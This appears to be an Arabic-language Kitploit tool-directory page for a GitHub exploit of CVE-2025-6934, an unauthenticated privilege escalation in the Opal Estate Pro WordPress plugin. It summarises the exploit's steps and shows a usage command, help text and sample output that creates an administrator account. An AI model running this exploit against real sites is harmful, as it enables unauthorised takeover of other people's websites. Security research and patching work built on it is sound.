Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6934 — Opal Estate Pro <= 1.7.5 - تصعيد صلاحيات بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-6934
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-6934

CVE-2025-6934

Opal Estate Pro <= 1.7.5 - تصعيد صلاحيات بدون مصادقة

عرض المستودع
92منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-6934 - تصعيد امتيازات غير مصادق عليه في Opal Estate Pro

📝 الوصف

إن البرنامج الإضافي Opal Estate Pro – Property Management and Submission لووردبريس، المستخدم في FullHouse - Real Estate Responsive WordPress Theme، معرض لـ تصعيد الامتيازات في جميع الإصدارات حتى 1.7.5 وما يشملها.


  • معرف CVE: CVE-2025-6934
  • درجة CVSS: 9.8 (حرج)
  • نُشر: 30 يونيو 2025

⚙️ معلومات النص البرمجي

يقوم هذا الاستغلال بلغة بايثون بأتمتة عملية تصعيد الامتيازات عبر:

  • التحقق من إصدار البرنامج الإضافي الضعيف عبر readme.txt.
  • جلب nonce المطلوب من صفحة التسجيل.
  • إرسال طلب تسجيل مصمم للحصول على وصول المسؤول.

🚀 مثال الاستخدام

root@kitploit:~
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234

📤 مخرجات نموذجية

root@kitploit:~
[•] Plugin Version Check:
    [+] Vulnerable version detected: 1.7.5

[•] Exploit Attempt Started
    [+] Nonce Found: 70dd70630b
    [+] HTTP Status: 200

[✔] Exploit Successful!
    --------------------------
    Username : nxploitedadmin
    Email    : [email protected]
    Password : nxp1234
    Role     : administrator
    --------------------------

Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited

🛠️ الوسائط والمساعدة

root@kitploit:~
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD

CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL (e.g., http://site.com/path/)
  -mail, --newmail NEWMAIL
                          Email to register as admin
  -password, --newpassword NEWPASSWORD
                          Password for new admin user

⚠️ إخلاء مسؤولية

هذا النص البرمجي مخصص لأغراض التعليم والاختبار الأمني المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة ضد أهداف دون موافقة ممنوع منعًا باتًا.


بواسطة: Khaled_alenazi (Nxploited)

تنزيل الأداة